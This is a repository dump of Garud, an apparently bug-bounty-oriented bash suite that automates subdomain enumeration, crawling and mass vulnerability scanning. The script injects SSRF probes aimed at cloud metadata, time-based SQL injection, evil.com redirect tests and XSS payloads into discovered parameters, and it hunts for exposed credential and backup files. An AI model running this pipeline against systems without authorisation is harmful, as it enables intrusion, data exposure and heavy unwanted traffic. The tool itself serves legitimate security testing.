21 | 22 | The script first enumerates all the subdomains of the give target domain using assetfinder, sublister, subfinder and amass then filters all live domains from the whole subdomain list then it extarct titles of the subdomains using httpx then it scans for subdomain takeover using nuclei. Then it uses gauplus to extract paramters of the given subdomains then it use gf patterns to filters xss, ssti, ssrf, sqli params from that given subdomains and then it scans for low hanging fruits as well. Then it'll save all the output in a text file like target-xss.txt. Then it will send the notifications about the scan using notify.
23 | 24 | ```txt 25 | What's new in v4.0: fixed some previous issues and filter out time waste vulns(you need to find them manually) and added dorking. 26 | ``` 27 | 28 |

How garud works

29 |


30 | garud mindmap
31 | 32 |


33 | 34 |

Installation

35 | 36 | **Requirements:** ``Go Language`` and ``Python 3``.
37 | **System requirements:** Recommended to run on vps with ``1VCPU`` and ``2GB RAM``.
38 | 39 | **Tools used - You must need to install these tools to use this script**
40 | 41 | `subfinder` • 42 | `sublist3r` • 43 | `gf patterns` • 44 | `dnsx` • 45 | `assetfinder` • 46 | `httpx` • 47 | `kxss` • 48 | `nuclei` • 49 | `dalfox` • 50 | `anew` • 51 | `notify` • 52 | `aquatone` • 53 | `amass` • 54 | `gau` • 55 | `crlfuzz` • 56 | `uro` • 57 | `ffuf` • 58 | `naabu` • 59 | `crobat` • 60 | `gobuster` • 61 | `gospider` • 62 | `waybackurls`
63 | 64 | 65 | ```bash 66 | #Make sure you're root before installing the tool 67 | 68 | garud:~ sudo su 69 | garud:~ apt install git 70 | garud:~ git clone https://github.com/R0X4R/Garud.git && cd Garud/ && chmod +x garud install.sh && mv garud /usr/bin/ && ./install.sh 71 | ``` 72 | 73 | > **Note**: If you encounter any-issue while running `install.sh` file or `garud` run `sed -i -e 's/\r$//' install.sh` 74 | 75 |

Usage

76 | 77 | 78 | ```js 79 | 80 | 81 | █▀▀▀ █▀▀█ █▀▀█ █░░█ █▀▀▄ 82 | █░▀█ █▄▄█ █▄▄▀ █░░█ █░░█ 83 | ▀▀▀▀ ▀░░▀ ▀░▀▀ ░▀▀▀ ▀▀▀░ 84 | 85 | [GARUD] == A RECONNAISSANCE SUITE FOR BUG BOUNTY (@R0X4R) 86 | 87 | Example Usage: 88 | garud [-d target.tld] [-x exclude domains] [--json] [-s] 89 | 90 | Flags: 91 | -d, --domain string Add your target -d target.tld 92 | -x, --exclude string Exclude out of scope domains -x /home/dommains.list 93 | 94 | Optional Flags: 95 | -s, --silent Hide output in the terminal Default: False 96 | -j, --json Store output in a single json file Default: False 97 | -v, --version Print current version of Garud 98 | 99 | ``` 100 | 101 | **Fix errors while using or installing Garud** 102 | 103 | ```bash 104 | garud:~ chmod +x install.sh && ./install.sh 105 | Error: ./install.sh : /bin/bash^M : bad interpretor: No such file or directory 106 | 107 | # fix 108 | garud:~ sed -i -e 's/\r$//' install.sh 109 | ``` 110 | You can also copy the error and search on google this will make your debugging skills better ;) 111 | 112 | **Example Usage** 113 | 114 | ```txt 115 | # garud -d hackerone.com 116 | ``` 117 | Exclude out of scope domains 118 | ```txt 119 | # echo test.hackerone.com > ossdomain.txt 120 | # garud -d hackerone.com -x ~/ossdomain.txt 121 | ``` 122 | With all flags 123 | ```txt 124 | # garud -d hackerone.com -j -s -x /home/oss.txt 125 | ``` 126 | 127 | Hide output in the terminal 128 | 129 | ```txt 130 | # garud -d hackerone.com -s 131 | ``` 132 | 133 | Store output in a single `json` file 134 | 135 | ```txt 136 | # garud -d hackerone.com -s -j 137 | # cd hackerone 138 | # cat output.json | jq 139 | { 140 | "nuclei_critical": [], 141 | "vuln_crlf": [], 142 | "dalfox": [ 143 | "[POC][V][GET][inATTR-double(3)-URL] http://subdomain.target.tld/hpp?pp=FUZZ%22onpointerout%3Dconfirm.call%28null%2C1%29+class%3Ddalfox+", 144 | ----------------------snip---------------------- 145 | "subdomains": [ 146 | "sub.target.tld", 147 | "tub.target.tld", 148 | "subdomain.target.tld" 149 | ], 150 | "vuln_xss": [ 151 | "[POTENTIAL XSS] - http://subdomain.target.tld/hpp/?pp=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E ", 152 | "[POTENTIAL XSS] - http://subdomain.target.tld:80/hpp/?pp=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E ", 153 | "[POTENTIAL XSS] - http://subdomain.target.tld:80/hpp/index.php?pp=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E " 154 | ] 155 | } 156 | ``` 157 | 158 | **Docker** 159 | 160 | Contributed by [`@frost19k`](https://github.com/frost19k) 161 | 162 | This image needs to be built with [`Buildkit`](https://docs.docker.com/develop/develop-images/build_enhancements/) 163 | ```bash 164 | garud:~ git clone https://github.com/R0X4R/Garud.git 165 | garud:~ cd Garud 166 | garud:~ docker buildx build -t garud -f Dockerfile . 167 | ``` 168 | 169 | To run the container 170 | ```bash 171 | garud:~ docker run -t --rm \ 172 | -v "/path/on/host":"/output" \ # Mount the Host Output Folder to "/output" 173 | -v "/path/to/configs":"/Garud/.config/notify" \ # Mount your Notify Config files to "/Garud/.config/notify" 174 | garud -d hackerone.com 175 | ``` 176 | Garud runs as root inside the container & so it is advisable to configure Linux Namespaces 177 | 1. [Isolate containers with a user namespace](https://docs.docker.com/engine/security/userns-remap/) 178 | 2. [Use Linux user namespaces to fix permissions in docker volumes](https://www.jujens.eu/posts/en/2017/Jul/02/docker-userns-remap/) 179 | 180 |

Notifications

181 | 182 | [`@slack`](https://slack.com/intl/en-it/help/articles/115005265063-Incoming-webhooks-for-Slack) • 183 | [`@discord`](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) • 184 | [`@telegram`](https://core.telegram.org/bots#3-how-do-i-create-a-bot) • 185 | [`configure-notify`](https://github.com/projectdiscovery/notify#config-file) 186 | 187 |

188 |

Donate

189 | 190 | |[`buymeacoffee.com/R0X4R`](https://www.buymeacoffee.com/R0X4R)|[`payU India`](https://pmny.in/bIKNZngt4ys1)|[`kofi.com/R0X4R`](https://ko-fi.com/i/IK3K34SJSA)| 191 | |--------|--------|------| 192 | 193 | ### Thanks to the authors of the tools used in this script. 194 | 195 | [`@aboul3la`](https://github.com/aboul3la) [`@tomnomnom`](https://github.com/tomnomnom) [`@lc`](https://github.com/lc) [`@hahwul`](https://github.com/hahwul) [`@projectdiscovery`](https://github.com/projectdiscovery) [`@maurosoria`](https://github.com/maurosoria) [`@shelld3v`](https://github.com/shelld3v) [`@devanshbatham`](https://github.com/devanshbatham) [`@michenriksen`](https://github.com/michenriksen) [`@defparam`](https://github.com/defparam/) [`@projectdiscovery`](https://github.com/projectdiscovery) [`@bp0lr`](https://github.com/bp0lr/) [`@ameenmaali`](https://github.com/ameenmaali) [`@dwisiswant0`](https://github.com/dwisiswant0) [`@OWASP`](https://github.com/OWASP/) [`@1ndianl33t`](https://github.com/1ndianl33t) [`@sqlmapproject`](https://github.com/sqlmapproject) [`@w9w`](https://github.com/w9w) [`@OJ`](https://github.com/OJ) [`@jaeles-project`](https://github.com/jaeles-project) [`@s0md3v`](https://github.com/s0md3v) [`@ffuf`](https://github.com/ffuf) 196 | 197 | Thanks to all the contributors [`contributors.md`](.github/contributors.md) 198 | 199 | **Warning:** This code was originally created for personal use, it generates a substantial amount of traffic, please use with caution. 200 | -------------------------------------------------------------------------------- /garud: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # coded by R0X4R 3 | # Garud - version 4.0 4 | # Contributers: KathanP19 (https://github.com/KathanP19), frost19k (https://github.com/frost19k), f8al (https://github.com/f8al), theamanrawat (https://github.com/theamanrawat), remonsec (https://github.com/remonsec), simrotion13 (https://github.com/simrotion13) 5 | 6 | #@> CHECK CONNECTION 7 | wget -q --spider http://google.com 8 | if [ $? -ne 0 ];then 9 | echo "Connect to internet before running Garud!" 10 | exit 127 11 | fi 12 | 13 | #@> VARIABLES 14 | DM= 15 | EC= 16 | SL=False 17 | JO=False 18 | RO=False 19 | VR="Garud v4.0" 20 | PR="21,22,80,81,280,300,443,583,591,593,832,981,1010,1099,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4444,4445,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7002,7396,7474,8000,8001,8008,8009,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8530,8531,8834,8880,8887,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,10443,11371,12043,12046,12443,15672,16080,17778,18091,18092,20720,28017,32000,55440,55672" 21 | 22 | #@> COLORS 23 | BK="\e[7m" 24 | RT="\e[0m" 25 | YW="\e[93m" 26 | GR="\e[32m" 27 | 28 | #@> PRINT USAGE 29 | PRINT_USAGE(){ 30 | echo -e "" 31 | echo -e "${YW} 32 | \t\t█▀▀▀ █▀▀█ █▀▀█ █░░█ █▀▀▄ 33 | \t\t█░▀█ █▄▄█ █▄▄▀ █░░█ █░░█ 34 | \t\t▀▀▀▀ ▀░░▀ ▀░▀▀ ░▀▀▀ ▀▀▀░ 35 | ${RT}" 36 | echo -e "[${YW}GARUD${RT}] == A RECONNAISSANCE SUITE FOR BUG BOUNTY (${BK}@R0X4R${RT})" 37 | echo -e "" 38 | echo -e "Example Usage:" 39 | echo -e "garud [-d target.tld] [-x exclude domains] [--json] [-s]" 40 | echo -e "" 41 | echo -e "Flags:" 42 | echo -e " -d, --domain ${BK}string${RT} Add your target -d target.tld" 43 | echo -e " -x, --exclude ${BK}string${RT} Exclude out of scope domains -x /home/dommains.list" 44 | echo -e "" 45 | echo -e "${BK}Optional Flags: ${RT}" 46 | echo -e " -s, --silent Hide output in the terminal ${GR}Default: ${BK}False${RT}" 47 | echo -e " -j, --json Store output in a single json file ${GR}Default: ${BK}False${RT}" 48 | echo -e " -v, --version Print current version of Garud" 49 | exit 0 50 | } 51 | 52 | #@> ARGUMENTS 53 | while [ -n "$1" ]; do 54 | case $1 in 55 | -d|--domain) 56 | DM=$2 57 | shift ;; 58 | 59 | -h|--help) 60 | PRINT_USAGE 61 | shift ;; 62 | 63 | -j|--json) 64 | JO='true' 65 | ;; 66 | 67 | -s|--silent) 68 | SL='true' 69 | ;; 70 | 71 | -x|--exclude) 72 | EC=$2 73 | shift ;; 74 | 75 | -v|--version) 76 | echo -e "$VR" 77 | exit 0 ;; 78 | 79 | *) 80 | PRINT_USAGE 81 | esac 82 | shift 83 | done 84 | 85 | 86 | #@> INITIAL CONFIGS 87 | if [ -z "$DM" ]; then 88 | echo -e "\n${BK}ERROR${RT} - TARGET NOT SUPPLIED." 89 | PRINT_USAGE 90 | fi 91 | 92 | if [ "$RO" == "true" ]; then 93 | JO='true' 94 | fi 95 | 96 | #@> DOCKER 97 | if [ -z "$CHROME_BIN" ]; then 98 | CHROME_BIN="/snap/bin/chromium" 99 | fi 100 | 101 | #@> EXIT FUNCTION 102 | trap ctrl_c INT 103 | ctrl_c(){ 104 | echo -e "" 105 | echo -e "${YW} [!] ${RT} KEYBOARD INTERRUPTION, ${GR}EXITING GARUD${RT}..." 106 | exit 127 107 | } 108 | 109 | #@> BANNER 110 | INFOM(){ 111 | clear 112 | echo -e "" 113 | echo -e "${YW} 114 | \t\t█▀▀▀ █▀▀█ █▀▀█ █░░█ █▀▀▄ 115 | \t\t█░▀█ █▄▄█ █▄▄▀ █░░█ █░░█ 116 | \t\t▀▀▀▀ ▀░░▀ ▀░▀▀ ░▀▀▀ ▀▀▀░ 117 | ${RT}" 118 | echo -e "[${YW}GARUD${RT}] == A RECONNAISSANCE SUITE FOR BUG BOUNTY (${BK}@R0X4R${RT})" 119 | OT=$(echo -e "$(echo $DM | sed -e 's/\.[a-z]*$//')_$(date +"%Y_%M_%d-%H_%M_%S")") 120 | mkdir -p $OT 2> /dev/null 121 | cd $OT 122 | echo -e "" 123 | echo -e "${BK}DOMAIN> ${RT}" | tr -d "\n"; echo -e " $DM" | pv -qL 6 124 | echo -e "${BK}OUTPUT> ${RT}" | tr -d "\n"; echo -e " $(pwd | sed 's/\// < /g' | cut -c 4-)" | pv -qL 6 125 | echo -e "[GARUD] - Scanning started on $DM at $(date)" | notify -silent 126 | } 127 | 128 | #@> MAKE FOLDERS 129 | MAKDR(){ 130 | mkdir -p .tmp 131 | mkdir -p database 132 | mkdir -p database/.gf 133 | mkdir -p database/dirs 134 | mkdir -p vulns 135 | [ "$JO" == "False" ] || mkdir -p .json 136 | } 137 | 138 | #@> SUBDOMAIN ENUMERATION 139 | SUBD_PASV(){ 140 | curl -s "https://crt.sh/?q=%25.$DM&output=json" | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u | grep -o "\w.*$DM" | anew -q .tmp/cert.list 141 | curl -s "https://api.hackertarget.com/hostsearch/?q=$DM" | grep -o "\w.*$DM" | anew -q .tmp/htarget.list 142 | curl -s "https://riddler.io/search/exportcsv?q=pld:$DM" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep -o "\w.*$DM" | anew -q .tmp/riddler.list 143 | assetfinder --subs-only $DM | anew -q .tmp/assetfinder.list 144 | python3 ~/tools/Sublist3r/sublist3r.py -d $DM -o .tmp/sublister.list &> /dev/null 145 | subfinder -silent -d $DM -all -t 100 -o .tmp/subfinder.list &> /dev/null 146 | amass enum -passive -d $DM -o .tmp/amass.list &> /dev/null 147 | crobat -s $DM | anew -q .tmp/crobat.list 148 | } 149 | 150 | SUBD_ACTV(){ 151 | timeout 50m ffuf -u http://FUZZ.$DM/ -t 100 -p '1.0-2.0' -w ~/wordlists/subdomains.txt -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" -mc 200 -r -o .tmp/ffuf.json -s 2> /dev/null &> /dev/null 152 | timeout 50m gobuster dns -d $DM --no-error -z -q -t 100 -w ~/wordlists/subdomains.txt 2> /dev/null | sed 's/Found: //g' | anew -q .tmp/gobuster.list 153 | timeout 50m amass enum -active -brute -w ~/wordlists/subdomains.txt -d $DM -o .tmp/amassact.list &> /dev/null 154 | cat .tmp/ffuf.json 2> /dev/null | jq -r '.results[] | .host' 2> /dev/null | anew -q .tmp/ffuf.list && rm -rf .tmp/ffuf.json 155 | } 156 | 157 | SUBD_SCND(){ 158 | cat .tmp/*.list | grep -v "*" | sed '/@\|
\|\_\|*/d' | grep "$DM" | anew -q .tmp/domains 159 | xargs -a .tmp/domains -P 50 -I % bash -c "assetfinder --subs-only % | anew -q .tmp/seconddomains.list" 2> /dev/null; timeout 30m xargs -a .tmp/domains -P 10 -I % bash -c "amass enum -passive -d %" 2> /dev/null | anew -q .tmp/seconddomains.list 160 | } 161 | 162 | SUBD_CHCK(){ 163 | #@> FILTERING DOMAINS 164 | if [ -f "$EC" ]; then 165 | cat .tmp/*.list | grep -v "*" | grep -vf $EC | sort -u | sed '/@\|
\|\_\|*/d' | dnsx -a -aaaa -cname -ns -ptr -mx -soa -retry 3 -r ~/wordlists/resolvers.txt -t 10 -silent | anew -q database/subdomains.txt 166 | else 167 | cat .tmp/*.list | grep -v "*" | sort -u | sed '/@\|
\|\_\|*/d' | dnsx -a -aaaa -cname -ns -ptr -mx -soa -retry 3 -r ~/wordlists/resolvers.txt -t 10 -silent | anew -q database/subdomains.txt 168 | fi 169 | 170 | #@> WEB PROBING AND SCREENSHOT 171 | naabu -retries 3 -r ~/wordlists/resolvers.txt -l database/subdomains.txt -p "$PR" -silent -no-color 2> /dev/null | anew -q database/ports.txt 172 | cat database/ports.txt | httprobe -prefer-https | anew -q database/lives.txt 173 | xargs -a database/lives.txt -P 50 -I % bash -c "echo % | aquatone -chrome-path $CHROME_BIN -out database/screenshots/ -threads 10 -silent" 2> /dev/null &> /dev/null 174 | [ "$JO" == "False" ] || cat database/lives.txt | python3 -c "import sys; import json; print (json.dumps({'liveurls':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/liveurls.json &> /dev/null 175 | [ "$JO" == "False" ] || cat database/subdomains.txt | python3 -c "import sys; import json; print (json.dumps({'subdomains':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/subdomains.json &> /dev/null 176 | [ "$JO" == "False" ] || cat database/ports.txt | python3 -c "import sys; import json; print (json.dumps({'ports':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/ports.json &> /dev/null 177 | } 178 | 179 | SUBD_SCAN(){ 180 | echo -e "" 181 | echo -e "${BK} ${RT}" | tr -d '\n' | pv -qL 4; echo -e " STARTING SUBDOMAIN SCANNING ON ${BK}$DM${RT} (${YW}it may take time${RT})" 182 | SUBD_PASV 183 | SUBD_ACTV 184 | SUBD_SCND 185 | SUBD_CHCK 186 | [ "$SL" == "False" ] && cat database/lives.txt 2> /dev/null 187 | echo -e "Subdomain enumeration completed, total [Subdomains:$(cat database/subdomains.txt | wc -l) Activeurls:$(cat database/lives.txt | wc -l)] found" | notify -silent &> /dev/null 188 | } 189 | 190 | #@> WEB CRAWLING AND FILTERING 191 | WEBC_RAWL(){ 192 | echo -e "${BK} ${RT}" | tr -d '\n' | pv -qL 6; echo -e " STARTING WEBCRAWLING ON ${BK}$DM${RT} (${YW}it may take time${RT})" 193 | agnee -d $DM -q -o database/dorks.txt -p 4 194 | timeout 50m gospider -S database/lives.txt -d 10 -c 20 -t 50 -K 3 --no-redirect --js -a -w --blacklist ".(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|svg|txt)" --include-subs -q -o .tmp/gospider 2> /dev/null | anew -q .tmp/gospider.list 195 | xargs -a database/lives.txt -P 50 -I % bash -c "echo % | waybackurls" 2> /dev/null | anew -q .tmp/waybackurls.list 196 | xargs -a database/lives.txt -P 50 -I % bash -c "echo % | gau --blacklist eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,svg,txt --retries 3 --threads 50" 2> /dev/null | anew -q .tmp/gau.list 2> /dev/null &> /dev/null 197 | cat .tmp/gospider.list .tmp/gau.list .tmp/waybackurls.list 2> /dev/null | sed '/\[/d' | grep $DM | sort -u | uro | anew -q database/urls.txt # <-- Filtering duplicate and common endpoints 198 | [ "$JO" == "False" ] || cat database/urls.txt | python3 -c "import sys; import json; print (json.dumps({'endpoints':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/urls.json &> /dev/null 199 | 200 | #@> FILTERING ENDPOINTS USING PATTERNS 201 | gf xss database/urls.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q database/.gf/xss.list 202 | gf lfi database/urls.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q database/.gf/lfi.list 203 | gf rce database/urls.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q database/.gf/rce.list 204 | gf ssrf database/urls.txt | sed "s/'\|(\|)//g" | bhedak "http://169.254.169.254/latest/meta-data/hostname" 2> /dev/null | anew -q database/.gf/ssrf.list 205 | gf ssti database/urls.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q database/.gf/ssti.list 206 | gf sqli database/urls.txt | sed "s/'\|(\|)//g" | bhedak "(select(0)from(select(sleep(5)))v)" 2> /dev/null | anew -q database/.gf/sqli.list 207 | gf redirect database/urls.txt | sed "s/'\|(\|)//g" | bhedak "http://www.evil.com/" 2> /dev/null | anew -q database/.gf/redirect.list 208 | 209 | xargs -a database/.gf/xss.list -P 30 -I % bash -c "echo % | kxss" 2> /dev/null | grep "< >\|\"" | awk '{print $2}' | anew -q .tmp/xssp.list 210 | cat .tmp/xssp.list 2> /dev/null | bhedak "\">/>" 2> /dev/null | anew -q .tmp/xss.txt 211 | } 212 | 213 | #@> NUCLEI SCAN 214 | NUCL_SCAN(){ 215 | echo -e "${BK} ${RT}" | tr -d '\n' | pv -qL 6; echo -e " STARTING NUCLEI VULNERABILITY SCANNING ON ${BK}$DM${RT} (${YW}it may take time${RT})" 216 | nuclei -update-templates 2> /dev/null &> /dev/null 217 | xargs -a database/lives.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -s info -c 10 -silent" 2> /dev/null | anew -q vulns/nuclei.txt 218 | xargs -a database/lives.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -s low -c 10 -silent" 2> /dev/null | anew vulns/nuclei.txt | notify -silent &> /dev/null 219 | xargs -a database/lives.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -s medium -c 10 -silent" 2> /dev/null | anew vulns/nuclei.txt | notify -silent &> /dev/null 220 | xargs -a database/lives.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -s high -c 10 -silent" 2> /dev/null | anew vulns/nuclei.txt | notify -silent &> /dev/null 221 | xargs -a database/lives.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -s critical -c 10 -silent" 2> /dev/null | anew vulns/nuclei.txt | notify -silent &> /dev/null 222 | [ "$JO" == "False" ] || cat vulns/nuclei.txt | python3 -c "import sys; import json; print (json.dumps({'nuclei_info':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/nuclei.json &> /dev/null 223 | [ "$SL" == "False" ] && cat vulns/nuclei.txt 224 | } 225 | 226 | #@> VULNERABILITY SCANNING 227 | VULN_SCAN(){ 228 | echo -e "${BK} ${RT}" | tr -d '\n' | pv -qL 6; echo -e " STARTING INJECTION VULNERABILITY SCANNING ON ${BK}$DM${RT} (${YW}it may take time${RT})" 229 | 230 | crlfuzz -l database/lives.txt -c 50 -s | anew vulns/crlf.txt | notify -silent &> /dev/null 231 | [ "$SL" == "False" ] && cat vulns/crlf.txt 2> /dev/null 232 | [ "$JO" == "False" ] || cat vulns/crlf.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_crlf':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/crlf.json &> /dev/null 233 | 234 | cat database/urls.txt | cut -d"?" -f1 | cut -d"=" -f1 | grep -iaE "([^.]+)\.zip$|([^.]+)\.zip\.[0-9]+$|([^.]+)\.zip[0-9]+$|([^.]+)\.zip[a-z][A-Z][0-9]+$|([^.]+)\.zip\.[a-z][A-Z][0-9]+$|([^.]+)\.rar$|([^.]+)\.tar$|([^.]+)\.tar\.gz$|([^.]+)\.tgz$|([^.]+)\.sql$|([^.]+)\.db$|([^.]+)\.sqlite$|([^.]+)\.pgsql\.txt$|([^.]+)\.mysql\.txt$|([^.]+)\.gz$|([^.]+)\.config$|([^.]+)\.log$|([^.]+)\.bak$|([^.]+)\.backup$|([^.]+)\.bkp$|([^.]+)\.crt$|([^.]+)\.dat$|([^.]+)\.eml$|([^.]+)\.java$|([^.]+)\.lst$|([^.]+)\.key$|([^.]+)\.passwd$|([^.]+)\.pl$|([^.]+)\.pwd$|([^.]+)\.mysql-connect$|([^.]+)\.jar$|([^.]+)\.cfg$|([^.]+)\.dir$|([^.]+)\.orig$|([^.]+)\.bz2$|([^.]+)\.old$|([^.]+)\.vbs$|([^.]+)\.img$|([^.]+)\.inf$|([^.]+)\.sh$|([^.]+)\.py$|([^.]+)\.vbproj$|([^.]+)\.mysql-pconnect$|([^.]+)\.war$|([^.]+)\.go$|([^.]+)\.psql$|([^.]+)\.sql\.gz$|([^.]+)\.vb$|([^.]+)\.webinfo$|([^.]+)\.jnlp$|([^.]+)\.cgi$|([^.]+)\.tmp$|([^.]+)\.ini$|([^.]+)\.webproj$|([^.]+)\.xsql$|([^.]+)\.raw$|([^.]+)\.inc$|([^.]+)\.lck$|([^.]+)\.nz$|([^.]+)\.rc$|([^.]+)\.html\.gz$|([^.]+)\.gz$|([^.]+)\.env$|([^.]+)\.yml$" | httpx -silent -follow-host-redirects | anew -q vulns/files.txt &> /dev/null 235 | [ "$JO" == "False" ] || cat vulns/files.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'sensitive':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/files.json &> /dev/null 236 | 237 | xargs -a .tmp/xss.txt -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"\" && echo -e \"[POTENTIAL XSS] - % \n \"" 2> /dev/null | grep "POTENTIAL XSS" | anew vulns/xss.txt | notify -silent &> /dev/null 238 | [ "$SL" == "False" ] && cat vulns/xss.txt 2> /dev/null 239 | [ "$JO" == "False" ] || cat vulns/xss.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_xss':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/xss.json &> /dev/null 240 | 241 | xargs -a database/.gf/ssrf.list -P 50 -I % bash -c "curl -ks -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"compute.internal\" && echo -e \"[POTENTIAL SSRF] - % \n \"" 2> /dev/null | grep "POTENTIAL SSRF" | anew vulns/ssrf.txt | notify -silent &> /dev/null 242 | [ "$SL" == "False" ] && cat vulns/ssrf.txt 2> /dev/null 243 | [ "$JO" == "False" ] || cat vulns/ssrf.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_ssrf':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/ssrf.json &> /dev/null 244 | 245 | xargs -a database/.gf/redirect.list -P 50 -I % bash -c "curl -s -iL -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"Evil.Com - We get it...Daily\" && echo -e \"[POTENTIAL REDIRECT] - % \n \"" 2> /dev/null | grep "POTENTIAL REDIRECT" | anew vulns/redirect.txt | notify -silent &> /dev/null 246 | [ "$SL" == "False" ] && cat vulns/redirect.txt 2> /dev/null 247 | [ "$JO" == "False" ] || cat vulns/redirect.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_redirect':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/redirect.json &> /dev/null 248 | 249 | timeout 50m xargs -a database/.gf/sqli.list -P 50 -I % bash -c "echo % | jeeves --payload-time 5" | grep "Vulnerable To" | anew vulns/sqli.txt | notify -silent 2> /dev/null &> /dev/null 250 | [ "$SL" == "False" ] && cat vulns/sqli.txt 2> /dev/null 251 | [ "$JO" == "False" ] || cat vulns/sqli.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_redirect':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/redirect.json &> /dev/null 252 | 253 | dalfox file .tmp/xssp.list --silence --no-color --waf-evasion --no-spinner --mass --mass-worker 100 --skip-bav -w 100 -H "X-Bugbounty: Testing" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" 2> /dev/null | anew vulns/dalfoxss.txt | notify -silent &> /dev/null 254 | [ "$SL" == "False" ] && cat vulns/dalfoxss.txt 2> /dev/null 255 | [ "$JO" == "False" ] || cat vulns/dalfoxss.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'dalfox':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/dalfox.json &> /dev/null 256 | 257 | [ "$JO" == "False" ] || cat .json/*.json | jq -s 'add' 2> /dev/null | tee output.json &> /dev/null 258 | } 259 | 260 | #@> DIRECTORY FUZZING 261 | FUZZ_DIRS(){ 262 | echo -e "${BK} ${RT}" | tr -d '\n' | pv -qL 6; echo -e " STARTING DIRECTORY FUZZING ON ${BK}$DM${RT} (${YW}it may take time${RT})" 263 | for target in $(cat database/lives.txt); do 264 | fuzzout=$(echo $target | awk -F// '{print $NF}' | sed -E 's/[\.|:]+/_/g') 265 | ffuf -u $target/FUZZ -ac -t 100 -mc 200 -sf -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" -w ~/wordlists/fuzz.txt -p '0.6-1.2' -e .html,.json,.php,.asp,.aspx,.log,.sql,.txt,.asp,.jsp,.bak,~,.db -maxtime 900 -o database/dirs/$fuzzout.json -s 2> /dev/null &> /dev/null 266 | cat database/dirs/$fuzzout.json | jq -r '.results[] | .status, .length, .url' 2> /dev/null | xargs -n3 | anew -q database/dirs/$fuzzout.txt 267 | rm -rf database/dirs/$fuzzout.json 268 | done 269 | } 270 | 271 | #@> SENDING FINAL NOTIFICATION 272 | SEND_NOTE(){ 273 | echo -e "" 274 | echo -e "${BK} SCANNING COMPLETED SUCCESSFULLY ON $DM ${RT}" 275 | echo -e "[GARUD] - Scanning completed on $DM at $(date)" | notify -silent 276 | } 277 | 278 | VAULT(){ 279 | SUBD_SCAN 2> /dev/null 280 | WEBC_RAWL 2> /dev/null 281 | NUCL_SCAN 2> /dev/null 282 | VULN_SCAN 2> /dev/null 283 | FUZZ_DIRS 2> /dev/null 284 | SEND_NOTE 2> /dev/null 285 | } 286 | 287 | while true 288 | do 289 | INFOM 290 | MAKDR 291 | VAULT 292 | exit 293 | done -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | BK="\e[7m" 3 | RT="\e[0m" 4 | GR="\e[32m" 5 | YW="\e[93m" 6 | 7 | if (( $EUID != 0 )); then 8 | echo -e "MAKE SURE YOU'RE ROOT BEFORE 